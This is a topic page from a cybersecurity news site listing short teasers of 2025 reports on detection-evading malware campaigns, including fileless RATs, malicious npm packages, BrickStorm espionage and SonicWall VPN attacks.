Topic: detection evasion

Sort by: Relevance | Date
  • Stealthy Fileless Malware Spreads RAT via Legitimate Tools
    September 12, 2025
    87%

    Stealthy Fileless Malware Spreads RAT via Legitimate Tools

    A fileless malware campaign uses trusted tools like ScreenConnect and PowerShell to deploy a remote access Trojan, leaving minimal forensic traces and evading detection. The attack loads payloads directly into memory via reflection, employs a .NET launcher to establish persistence and disable sec...

    Read More »
  • Malicious npm Packages Target Ethereum Smart Contracts
    September 5, 2025
    87%

    Malicious npm Packages Target Ethereum Smart Contracts

    A new wave of malicious npm packages uses Ethereum smart contracts to hide command-and-control infrastructure, making detection more difficult. Attackers also created fake GitHub repositories with artificially inflated metrics to appear legitimate and target cryptocurrency developers. This campai...

    Read More »
  • Beyond Email: The New Frontier of Phishing Attacks
    September 25, 2025
    85%

    Beyond Email: The New Frontier of Phishing Attacks

    Phishing attacks are increasingly moving beyond email to exploit social media, messaging apps, and malicious ads, challenging traditional email-focused security defenses. These multi-channel attacks use sophisticated obfuscation techniques to evade detection and often target core identity platfor...

    Read More »
  • Google: BrickStorm Malware Stole U.S. Data for a Year
    September 25, 2025
    84%

    Google: BrickStorm Malware Stole U.S. Data for a Year

    A sophisticated cyber espionage campaign using BrickStorm malware successfully stole sensitive data from American technology, legal, SaaS, and BPO companies for over a year before being detected. The malware, attributed to China-linked group UNC5221, is a versatile backdoor that operates stealthi...

    Read More »
  • Stealth Malware Campaign Infects Thousands via DNS TXT Abuse
    October 11, 2025
    83%

    Stealth Malware Campaign Infects Thousands via DNS TXT Abuse

    The Detour Dog malware campaign has infected over 30,000 websites, using DNS TXT records for server-side attacks that remain hidden from most users, selectively targeting specific visitors for redirection or malware downloads. This attack operates by having compromised servers send DNS queries wi...

    Read More »
  • SonicWall VPN Attacks Intensify, MFA Bypassed
    September 30, 2025
    78%

    SonicWall VPN Attacks Intensify, MFA Bypassed

    A ransomware group named Akira is exploiting SonicWall SSL VPN appliances, primarily through a known vulnerability (CVE-2024-40766), to bypass multi-factor authentication and gain unauthorized access. The attacks are highly automated and rapid, with intruders moving quickly to scan networks and d...

    Read More »
  • 'BRICKSTORM' Backdoor: Chinese Hackers Target US Firms
    September 27, 2025
    75%

    'BRICKSTORM' Backdoor: Chinese Hackers Target US Firms

    A sophisticated cyber espionage campaign using the BRICKSTORM backdoor is targeting U.S. companies, particularly in legal, tech, and SaaS sectors, and is attributed to Chinese-aligned hackers with goals beyond intelligence gathering. The threat actors, known as UNC5221, employ a complex, multi-st...

    Read More »

Related Topics

data exfiltration (56) lateral movement (26) google threat intelligence (12) command and control (3) threat intelligence (59) vulnerability exploitation (39) security recommendations (35) network security (33)